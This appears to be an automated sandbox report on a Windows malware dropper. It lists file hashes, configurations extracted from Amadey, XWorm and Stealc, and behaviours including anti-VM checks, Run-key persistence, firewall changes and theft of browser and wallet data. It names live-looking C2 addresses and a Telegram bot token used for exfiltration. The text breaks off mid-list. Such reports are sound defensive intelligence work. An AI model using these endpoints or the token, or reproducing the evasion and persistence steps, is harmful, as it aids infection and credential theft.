Analysis
-
max time kernel
97s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
28-04-2024 05:41
Static task
static1
Behavioral task
behavioral1
Sample
fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe
Resource
win10v2004-20240426-en
Errors
General
-
Target
fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe
-
Size
1.8MB
-
MD5
8ee151e8a6df267efc06d71ed339030e
-
SHA1
1a0bef02ecc1a20552d9b8bd3490ae73f3c40f8c
-
SHA256
fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086
-
SHA512
b31e95334ee5bc0a1269d4b264ad5717cee5b45869c9b5221a3133e761cc77f480c5d89fcf1cdfcdb3858e4840c6152252f80982cce93c0a494a3dbba578799a
-
SSDEEP
49152:t3/bnk7qkWHtJgToSSn9HNaH2w27UUWGeN:tjnk7q20dfaH3XUW
Malware Config
Extracted
amadey
4.20
http://193.233.132.139
-
install_dir
5454e6f062
-
install_file
explorta.exe
-
strings_key
c7a869c5ba1d72480093ec207994e2bf
-
url_paths
/sev56rkm/index.php
Extracted
amadey
4.17
http://193.233.132.167
-
install_dir
4d0ab15804
-
install_file
chrosha.exe
-
strings_key
1a9519d7b465e1f4880fa09a6162d768
-
url_paths
/enigma/index.php
Extracted
xworm
5.0
127.0.0.1:7000
91.92.252.220:7000
41.199.23.195:7000
saveclinetsforme68465454711991.publicvm.com:7000
bBT8anvIxhxDFmkf
-
Install_directory
%AppData%
-
install_file
explorer.exe
-
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Extracted
stealc
http://185.172.128.62
-
url_path
/902e53a07830e030.php
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe family_xworm behavioral1/memory/1876-215-0x00000000004F0000-0x0000000000502000-memory.dmp family_xworm -
Detect ZGRat V1 3 IoCs
Processes:
resource yara_rule behavioral1/memory/4776-956-0x000001F5331E0000-0x000001F536AD8000-memory.dmp family_zgrat_v1 behavioral1/memory/4776-971-0x000001F551490000-0x000001F5515A0000-memory.dmp family_zgrat_v1 behavioral1/memory/4776-975-0x000001F5387F0000-0x000001F538814000-memory.dmp family_zgrat_v1 -
Glupteba payload 7 IoCs
Processes:
resource yara_rule behavioral1/memory/5156-508-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral1/memory/5336-507-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral1/memory/5232-827-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral1/memory/5724-828-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral1/memory/5724-1012-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral1/memory/5232-1022-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral1/memory/5232-1052-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
57jo5fUVeWmkZmhmw7Fi2Zof.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" 57jo5fUVeWmkZmhmw7Fi2Zof.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
Processes:
fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exeexplorta.exeamert.exeexplorta.exechrosha.exe06feb1f97d.exe57jo5fUVeWmkZmhmw7Fi2Zof.exeexplorta.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amert.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ chrosha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 06feb1f97d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 57jo5fUVeWmkZmhmw7Fi2Zof.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe -
Blocklisted process makes network request 4 IoCs
Processes:
rundll32.exerundll32.exemsiexec.exeflow pid process 122 6608 rundll32.exe 122 6608 rundll32.exe 128 4308 rundll32.exe 272 5832 msiexec.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 5856 netsh.exe 5680 netsh.exe -
Checks BIOS information in registry 2 TTPs 19 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
amert.exechrosha.exeInstall.exeexplorta.exeexplorta.exe06feb1f97d.exe57jo5fUVeWmkZmhmw7Fi2Zof.exeInstall.exerundll32.exefe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exeexplorta.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 06feb1f97d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 57jo5fUVeWmkZmhmw7Fi2Zof.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 57jo5fUVeWmkZmhmw7Fi2Zof.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 06feb1f97d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
d89781e451.exeregasm.exeInstall.exeu2r0.3.exefe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exeexplorta.exechrosha.exeZleUyzy9WRVICP6WvVkSUjzN.exemstc.exegfswPFz.exeInstall.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation d89781e451.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation regasm.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation u2r0.3.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation explorta.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation chrosha.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation ZleUyzy9WRVICP6WvVkSUjzN.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation mstc.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation gfswPFz.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation Install.exe -
Drops startup file 11 IoCs
Processes:
regasm.exemstc.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hIvg2m8fSDZL5CKRu5bt1PrM.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H5AmP1Bu7euIHnF7Jbl0xe4d.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk mstc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZBRRIw8oikTFvWTHzOY94AGt.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pShpQdOmB2evffXqvFuid8K0.bat regasm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk mstc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tJayfONwY28Tne51PCkK51QK.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36dIQIRrxCB4HjYro06cKeQn.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AzRodTEYvdXhkOxY3FgKYeUc.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JKYD3CHzvR2AY0TzJynO9EhB.bat regasm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKhj8AJLHy3DYPwUJu4uwYEg.bat regasm.exe -
Executes dropped EXE 39 IoCs
Processes:
explorta.exeamert.exed89781e451.exeexplorta.exechrosha.exe06feb1f97d.exefile300un.exemstc.exeZleUyzy9WRVICP6WvVkSUjzN.exeuon7YhUxbxygHEmdqaGh1jhy.exe91jwA6wQnD20jEFlNGHkRWzr.exeu2r0.0.exe57jo5fUVeWmkZmhmw7Fi2Zof.exerun.exe91jwA6wQnD20jEFlNGHkRWzr.exeuon7YhUxbxygHEmdqaGh1jhy.exeQiAtIglbeauCaEygsP90Kflf.exe2MYMzGM0Ir1ZgoCjigWHeOoy.exe2MYMzGM0Ir1ZgoCjigWHeOoy.exe2MYMzGM0Ir1ZgoCjigWHeOoy.exeInstall.exeu2r0.3.exe2MYMzGM0Ir1ZgoCjigWHeOoy.exe2MYMzGM0Ir1ZgoCjigWHeOoy.exeInstall.exeAssistant_109.0.5097.45_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.execsrss.exeinjector.exewindefender.exewindefender.exeexplorta.exegfswPFz.exeexplorer.exeleykNOBNSzbftkeOiFe2gzF6.exece-installer_7.14.2_vbox-6.1.20.exepLUaCKBxfWyIAv3qV3OFZGpE.exeInstall.exepid process 5064 explorta.exe 2264 amert.exe 4640 d89781e451.exe 3572 explorta.exe 4016 chrosha.exe 3036 06feb1f97d.exe 368 file300un.exe 1876 mstc.exe 3564 ZleUyzy9WRVICP6WvVkSUjzN.exe 5156 uon7YhUxbxygHEmdqaGh1jhy.exe 5336 91jwA6wQnD20jEFlNGHkRWzr.exe 5876 u2r0.0.exe 6024 57jo5fUVeWmkZmhmw7Fi2Zof.exe 2528 run.exe 5232 91jwA6wQnD20jEFlNGHkRWzr.exe 5724 uon7YhUxbxygHEmdqaGh1jhy.exe 5292 QiAtIglbeauCaEygsP90Kflf.exe 5256 2MYMzGM0Ir1ZgoCjigWHeOoy.exe 5796 2MYMzGM0Ir1ZgoCjigWHeOoy.exe 6208 2MYMzGM0Ir1ZgoCjigWHeOoy.exe 6148 Install.exe 6272 u2r0.3.exe 6396 2MYMzGM0Ir1ZgoCjigWHeOoy.exe 6544 2MYMzGM0Ir1ZgoCjigWHeOoy.exe 3148 Install.exe 4068 Assistant_109.0.5097.45_Setup.exe_sfx.exe 2500 assistant_installer.exe 5228 assistant_installer.exe 5568 csrss.exe 4508 injector.exe 4504 windefender.exe 2764 windefender.exe 6308 explorta.exe 6724 gfswPFz.exe 4320 explorer.exe 6900 leykNOBNSzbftkeOiFe2gzF6.exe 3600 ce-installer_7.14.2_vbox-6.1.20.exe 4684 pLUaCKBxfWyIAv3qV3OFZGpE.exe 5424 Install.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
amert.exeexplorta.exechrosha.exe06feb1f97d.exeexplorta.exefe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exeexplorta.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine amert.exe Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine chrosha.exe Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine 06feb1f97d.exe Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine explorta.exe -
Loads dropped DLL 18 IoCs
Processes:
run.exe2MYMzGM0Ir1ZgoCjigWHeOoy.exe2MYMzGM0Ir1ZgoCjigWHeOoy.exe2MYMzGM0Ir1ZgoCjigWHeOoy.exe2MYMzGM0Ir1ZgoCjigWHeOoy.exe2MYMzGM0Ir1ZgoCjigWHeOoy.exerundll32.exerundll32.exerundll32.exeu2r0.0.exeassistant_installer.exeassistant_installer.exerundll32.exeMsiExec.exeMsiExec.exepid process 2528 run.exe 5256 2MYMzGM0Ir1ZgoCjigWHeOoy.exe 5796 2MYMzGM0Ir1ZgoCjigWHeOoy.exe 6208 2MYMzGM0Ir1ZgoCjigWHeOoy.exe 6396 2MYMzGM0Ir1ZgoCjigWHeOoy.exe 6544 2MYMzGM0Ir1ZgoCjigWHeOoy.exe 6572 rundll32.exe 6608 rundll32.exe 4308 rundll32.exe 5876 u2r0.0.exe 5876 u2r0.0.exe 2500 assistant_installer.exe 2500 assistant_installer.exe 5228 assistant_installer.exe 5228 assistant_installer.exe 1656 rundll32.exe 6880 MsiExec.exe 6100 MsiExec.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\57jo5fUVeWmkZmhmw7Fi2Zof.exe themida behavioral1/memory/6024-295-0x0000000140000000-0x000000014072B000-memory.dmp themida behavioral1/memory/6024-826-0x0000000140000000-0x000000014072B000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
mstc.exeuon7YhUxbxygHEmdqaGh1jhy.exe91jwA6wQnD20jEFlNGHkRWzr.execsrss.exeleykNOBNSzbftkeOiFe2gzF6.exeexplorta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" mstc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 91jwA6wQnD20jEFlNGHkRWzr.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" leykNOBNSzbftkeOiFe2gzF6.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d89781e451.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\d89781e451.exe" explorta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\06feb1f97d.exe = "C:\\Users\\Admin\\1000017002\\06feb1f97d.exe" explorta.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
57jo5fUVeWmkZmhmw7Fi2Zof.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 57jo5fUVeWmkZmhmw7Fi2Zof.exe -
Drops Chrome extension 2 IoCs
Processes:
gfswPFz.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json gfswPFz.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json gfswPFz.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
gfswPFz.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini gfswPFz.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
2MYMzGM0Ir1ZgoCjigWHeOoy.exemsiexec.exe2MYMzGM0Ir1ZgoCjigWHeOoy.exedescription ioc process File opened (read-only) \??\D: 2MYMzGM0Ir1ZgoCjigWHeOoy.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\D: 2MYMzGM0Ir1ZgoCjigWHeOoy.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\F: 2MYMzGM0Ir1ZgoCjigWHeOoy.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\F: 2MYMzGM0Ir1ZgoCjigWHeOoy.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 98 ip-api.com 100 api.myip.com 104 ipinfo.io 105 ipinfo.io -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMonFS csrss.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000016001\d89781e451.exe autoit_exe -
Drops file in System32 directory 44 IoCs
Processes:
gfswPFz.exe57jo5fUVeWmkZmhmw7Fi2Zof.exepowershell.exepowershell.exeInstall.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F gfswPFz.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini 57jo5fUVeWmkZmhmw7Fi2Zof.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA gfswPFz.exe File opened for modification C:\Windows\System32\GroupPolicy 57jo5fUVeWmkZmhmw7Fi2Zof.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 gfswPFz.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA gfswPFz.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA gfswPFz.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol 57jo5fUVeWmkZmhmw7Fi2Zof.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 gfswPFz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F gfswPFz.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI 57jo5fUVeWmkZmhmw7Fi2Zof.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 gfswPFz.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exeexplorta.exeamert.exechrosha.exeexplorta.exe06feb1f97d.exe57jo5fUVeWmkZmhmw7Fi2Zof.exeexplorta.exepid process 2004 fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe 5064 explorta.exe 2264 amert.exe 4016 chrosha.exe 3572 explorta.exe 3036 06feb1f97d.exe 6024 57jo5fUVeWmkZmhmw7Fi2Zof.exe 6308 explorta.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
